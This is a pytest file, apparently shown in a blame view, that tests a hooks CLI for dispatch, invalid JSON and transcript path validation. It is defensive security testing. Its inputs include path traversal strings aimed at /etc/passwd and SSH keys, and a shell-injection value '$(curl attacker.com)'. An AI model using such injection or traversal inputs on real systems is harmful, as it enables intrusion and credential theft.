|
|
|
|
|
with patch("mempalace.hooks_cli._output") as mock_output:
|
|
|
|
|
run_hook("stop", "claude-code")
|
|
|
|
|
mock_output.assert_called_once_with({})
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_run_hook_dispatches_precompact(tmp_path):
|
|
|
|
|
stdin_data = json.dumps({"session_id": "run-test"})
|
|
|
|
|
with patch("sys.stdin", io.StringIO(stdin_data)):
|
|
|
|
|
with patch("mempalace.hooks_cli.STATE_DIR", tmp_path):
|
|
|
|
|
with patch("mempalace.hooks_cli._output") as mock_output:
|
|
|
|
|
run_hook("precompact", "claude-code")
|
2026-04-15 12:26:54 +05:00
|
|
|
mock_output.assert_called_once_with({})
|
2026-04-08 20:54:41 +03:00
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_run_hook_unknown_hook():
|
|
|
|
|
stdin_data = json.dumps({"session_id": "test"})
|
|
|
|
|
with patch("sys.stdin", io.StringIO(stdin_data)):
|
|
|
|
|
with pytest.raises(SystemExit) as exc_info:
|
|
|
|
|
run_hook("nonexistent", "claude-code")
|
|
|
|
|
assert exc_info.value.code == 1
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_run_hook_invalid_json(tmp_path):
|
|
|
|
|
"""Invalid stdin JSON should not crash — falls back to empty dict."""
|
|
|
|
|
with patch("sys.stdin", io.StringIO("not valid json")):
|
|
|
|
|
with patch("mempalace.hooks_cli.STATE_DIR", tmp_path):
|
|
|
|
|
with patch("mempalace.hooks_cli._output") as mock_output:
|
|
|
|
|
run_hook("session-start", "claude-code")
|
|
|
|
|
mock_output.assert_called_once_with({})
|
2026-04-13 14:10:04 -03:00
|
|
|
|
|
|
|
|
|
|
|
|
|
# --- Security: transcript_path validation ---
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_validate_transcript_rejects_path_traversal():
|
|
|
|
|
"""Paths with '..' components should be rejected."""
|
|
|
|
|
assert _validate_transcript_path("../../etc/passwd") is None
|
|
|
|
|
assert _validate_transcript_path("../../../.ssh/id_rsa") is None
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_validate_transcript_rejects_wrong_extension():
|
|
|
|
|
"""Only .jsonl and .json extensions are accepted."""
|
|
|
|
|
assert _validate_transcript_path("/tmp/transcript.txt") is None
|
|
|
|
|
assert _validate_transcript_path("/tmp/secret.py") is None
|
|
|
|
|
assert _validate_transcript_path("/home/user/.ssh/id_rsa") is None
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_validate_transcript_accepts_valid_paths(tmp_path):
|
|
|
|
|
"""Valid .jsonl and .json paths should be accepted."""
|
|
|
|
|
jsonl_path = tmp_path / "session.jsonl"
|
|
|
|
|
jsonl_path.touch()
|
|
|
|
|
result = _validate_transcript_path(str(jsonl_path))
|
|
|
|
|
assert result is not None
|
|
|
|
|
assert result.suffix == ".jsonl"
|
|
|
|
|
|
|
|
|
|
json_path = tmp_path / "session.json"
|
|
|
|
|
json_path.touch()
|
|
|
|
|
result = _validate_transcript_path(str(json_path))
|
|
|
|
|
assert result is not None
|
|
|
|
|
assert result.suffix == ".json"
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_validate_transcript_empty_string():
|
|
|
|
|
"""Empty transcript path should return None."""
|
|
|
|
|
assert _validate_transcript_path("") is None
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_count_rejects_traversal_path():
|
|
|
|
|
"""_count_human_messages should return 0 for path traversal attempts."""
|
|
|
|
|
assert _count_human_messages("../../etc/passwd") == 0
|
|
|
|
|
|
|
|
|
|
|
2026-04-13 14:18:09 -03:00
|
|
|
def test_count_logs_warning_on_rejected_path(tmp_path):
|
|
|
|
|
"""_count_human_messages should log a warning when a non-empty path is rejected."""
|
|
|
|
|
with patch("mempalace.hooks_cli.STATE_DIR", tmp_path):
|
|
|
|
|
with patch("mempalace.hooks_cli._log") as mock_log:
|
|
|
|
|
_count_human_messages("../../etc/passwd")
|
|
|
|
|
mock_log.assert_called_once()
|
|
|
|
|
assert "rejected" in mock_log.call_args[0][0].lower()
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def test_validate_transcript_accepts_platform_native_path(tmp_path):
|
|
|
|
|
"""Validator accepts platform-native paths (backslashes on Windows, slashes on Unix)."""
|
|
|
|
|
session_file = tmp_path / "projects" / "abc123" / "session.jsonl"
|
|
|
|
|
session_file.parent.mkdir(parents=True)
|
|
|
|
|
session_file.touch()
|
|
|
|
|
# Use the OS-native string representation (backslashes on Windows)
|
|
|
|
|
result = _validate_transcript_path(str(session_file))
|
|
|
|
|
assert result is not None
|
|
|
|
|
assert result.suffix == ".jsonl"
|
|
|
|
|
assert result.is_file()
|
|
|
|
|
|
|
|
|
|
|
2026-04-13 14:10:04 -03:00
|
|
|
def test_stop_hook_rejects_injected_stop_hook_active(tmp_path):
|
2026-04-21 13:20:52 -07:00
|
|
|
"""stop_hook_active with shell injection string should not cause pass-through.
|
|
|
|
|
|
|
|
|
|
Verifies the injected value is not treated as truthy — the save path runs
|
|
|
|
|
instead of being short-circuited. Mocks _save_diary_direct so we can assert
|
|
|
|
|
it was invoked regardless of silent vs legacy save mode.
|
|
|
|
|
"""
|
2026-04-13 14:10:04 -03:00
|
|
|
transcript = tmp_path / "t.jsonl"
|
|
|
|
|
_write_transcript(
|
|
|
|
|
transcript,
|
|
|
|
|
[{"message": {"role": "user", "content": f"msg {i}"}} for i in range(SAVE_INTERVAL)],
|
|
|
|
|
)
|
2026-04-21 13:20:52 -07:00
|
|
|
with patch(
|
|
|
|
|
"mempalace.hooks_cli._save_diary_direct", return_value={"count": 1, "themes": []}
|
|
|
|
|
) as mock_save:
|
|
|
|
|
_capture_hook_output(
|
|
|
|
|
hook_stop,
|
|
|
|
|
{
|
|
|
|
|
"session_id": "test",
|
|
|
|
|
"stop_hook_active": "$(curl attacker.com)",
|
|
|
|
|
"transcript_path": str(transcript),
|
|
|
|
|
},
|
|
|
|
|
state_dir=tmp_path,
|
|
|
|
|
)
|
|
|
|
|
# The injected value is not "true"/"1"/"yes", so the hook should NOT pass through.
|
|
|
|
|
# Save must have been attempted.
|
|
|
|
|
assert mock_save.called
|